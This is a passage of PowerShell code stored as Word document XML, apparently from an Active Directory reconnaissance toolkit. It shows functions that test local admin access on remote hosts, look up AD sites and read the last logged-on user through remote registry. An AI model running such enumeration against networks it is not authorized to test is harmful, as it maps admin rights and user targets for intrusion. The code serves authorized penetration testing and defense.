      </w:r>
    </w:p>
    <w:p w14:paraId="2B73DD9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709D27D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDCC1F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26097E7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55465AF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BF871" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716CA8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065C30B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AF83078" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6863A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2F108" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42A575B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # 0xF003F - SC_MANAGER_ALL_ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A16443" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90516E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90C2CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="358E0425" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "Invoke-CheckLocalAdminAccess handle: $Handle"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2441D8FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D2DF159" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $IsAdmin = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690A6D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D7931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2AFF4D01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # if we get a non-zero handle back, everything was successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39F10A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Handle -ne 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0BFAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null = $Advapi32::CloseServiceHandle($Handle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2525849F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D9384" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0FAEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD75D59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324CD7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC0A0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A862B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4509D33F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $IsAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F9F77F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24989449" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C7D837F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="462A63D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-SiteName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634544F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737375FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F828F4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EC06AE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will use the DsGetSiteName Win32API call to look up the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D19892" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        name of the site where a specified computer resides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D720E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15156415" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD3545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FE18862" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to look the site up for, default to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A39FC3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D8E3B1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447E1BDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34FF5802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-SiteName -ComputerName WINDOWS1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E00816" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27A31926" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the site for WINDOWS1.testlab.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37088286" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C841F9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD3761" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D025550" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Get-SiteName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FA611" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0AE2C95F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the sites for every machine in AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39540A45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681ABADA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F2977" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66A620" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6600090B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67C8BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C90B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D979937" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = $Env:ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD8E53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9DA98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2833EE42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B482953" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A663CB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F33A06E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # if we get an IP address, try to resolve the IP to a hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E6A0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56BF72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IPAddress = $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFB72FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Computer = [System.Net.Dns]::GetHostByAddress($Computer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057780C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493E134" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48336759" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IPAddress = @(Get-IPAddress -ComputerName $Computer)[0].IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710AAE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55795D7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C04BB76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $PtrInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C986E0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EC25D1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517ACF17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F678FFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ComputerSite = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B55DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E9FCCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93B4CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="108C6AD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Result -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB03C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCF568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5F8A66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D28F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128A71A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ErrorMessage = "Error: $(([ComponentModel.Win32Exception] $Result).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F6C74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerSite | Add-Member Noteproperty 'SiteName' $ErrorMessage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210A071" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7E418" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75264CC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $Netapi32::NetApiBufferFree($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C42E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="437EDB27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ComputerSite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA3517" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C3AFF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E424CE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="408D2045" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-LastLoggedOn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011BD58E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC5DF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C8040" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72A10834" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function uses remote registry functionality to return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C49918" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the last user logged onto a target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31FE44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BF45AA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Note: This function requires administrative rights on the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846C4B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        machine you're enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF54041" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64AEB1B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE38FFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6117E20E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for the last logged on user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C482AAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Defaults to the localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2799DE6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54F6E2A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E60E49A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="062E9E92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object for the remote connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45860A79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="424CB014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BCD3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46CCFB5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-LastLoggedOn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4220F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="252B7C48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the last user logged onto the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BA00A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="404756DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBE462" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD52865" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-LastLoggedOn -ComputerName WINDOWS1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457B6549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29E97D02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the last user logged onto WINDOWS1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D873F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DEA6DB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557F68EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E96AE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Get-LastLoggedOn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5C2E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
